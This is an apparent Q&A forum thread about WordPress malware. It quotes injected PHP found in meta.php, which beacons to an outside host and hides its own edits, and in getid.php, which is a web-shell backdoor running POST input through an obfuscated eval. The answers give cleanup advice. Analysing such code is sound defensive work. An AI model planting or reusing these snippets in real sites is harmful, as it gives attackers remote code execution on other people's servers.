# Is this wordpress virus?

Tags: php, wordpress, frameworks, eval

I've just noticed that some of my wordpress projects contain some random code in a specific location.

For example:
**wp-includes/meta.php** contains in the bottom of file code below:

```
check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456732115){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
```

Another location: **wp-includes/ID3/getid.php** contains code below:

```
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
```

Basically, what I'm seeing is that **check_meta()** method is updating **wp-includes/meta.php** file without changing it's modified time. Then, the **file_get_contents** is connecting with some Chinese server and passing some data through the **$_GET**.

In the second file, str_rot13('riny') is equal to **eval**

Does anybody deal with that kind of problem before? Maybe someone can say more about this code. Looking forward to hearing from you. For this moment I treat it like a virus cause it has spread to many of my projects.

Comment: I visited `http://web.51.la:82` and it printed out all information about me: ip address, browser and so on. It might be a tracking type plugin for tracking visits and stuff, I'm not sure why someone would want to gather information about your visitors otherwise.

Comment: I think you'd probably get a better response if you posted in WordPress Development Stack Exchange http://wordpress.stackexchange.com/

Answer (score 3):

Never trust unfamiliar code that you didn't include! Scammers often try to make malware look innocuous, like above. Try installing WordFence, Sucuri, or another security plugin and run a scan.

Answer (score 2):

That looks like your server has been hacked I had to deal with similar issues one or two times in the past. And yes the hack seems like it is specifically targeted to WordPress sites.

The WordPress core should never be modified anyway.

1. Change all your server passwords (customer center, FTP, SSH, SQL, whatever)
2. Download a fresh installation of the WordPress core and remove the old one
3. Check your wp-content folder for security issues especially your Theme and your Plugins (check for any modified or insecure code)
4. Change your security salts in wp-config.php
5. After a fresh setup of your WordPress site increase its security. There are various articles on how to secure WordPress and there are several WordPress security Plugins available. Scan your site.
6. If a similar problem appears again you should also check the security settings of your webserver / webhost.